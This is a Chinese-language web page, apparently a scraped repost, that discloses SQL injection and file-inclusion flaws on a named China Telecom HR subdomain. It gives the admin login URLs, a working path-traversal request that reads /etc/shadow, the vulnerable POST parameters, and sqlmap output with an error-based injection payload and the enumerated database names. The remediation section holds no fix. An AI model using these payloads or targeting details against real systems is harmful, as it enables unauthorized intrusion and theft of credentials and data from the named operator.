您现在的位置: > 新闻资讯 > 人物焦点 >

中国电信某站SQL注入+文件包含漏洞

时间:2020-10-17 01:03 点击:

  核心提示:中国电信某站SQL注入+文件包含漏洞后台一:http: rs hntelecom net cn HRSystem initIndex do后台二:http: rs hntelecom net cn loginadmin do?m=login漏洞类型...

中国电信某站SQL注入+文件包含漏洞

后台一:https://rs.hntelecom.net.cn/HRSystem/initIndex.do

后台二:https://rs.hntelecom.net.cn/loginadmin.do?m=login

漏洞类型一:

文件包含:rs.hntelecom.net.cn/filedown.do?m=filedown&path=http://www.2cto.com/../..//../..//../..//../..//../..//etc/shadow%00

 

中国电信某站SQL注入+文件包含漏洞

看到没有,root权限的哦

漏洞类型二:

地址:rs.hntelecom.net.cn/search.do?m=search

post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test

地址:rs.hntelecom.net.cn/searchD.do?m=searchD

post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test

话说2个地址都是一样功能,搞出2个有意思吗
 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: ttt Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: sss=1&Submit=�� ��&ttt=1' AND (SELECT 7373 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,108,100,58),(SELECT (CASE WHEN (7373=7373) THEN 1 ELSE 0 END)),CHAR(58,111,112,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'JyFl'='JyFl --- available databases [4]: [*] information_schema [*] manpower [*] test [*] yiqilaifinddifferences
修复方案:

不继续深入,存在进一步渗透风险。

 

作者:采集侠  来源:网络整理
  • 电脑维修知识网(xxxxxx.com) © 2014 版权所有 All Rights Reserved.
  • Email:pcweixiu@tom.com 站长QQ:20567788
  • 技术支持与报障: 电脑维修知识网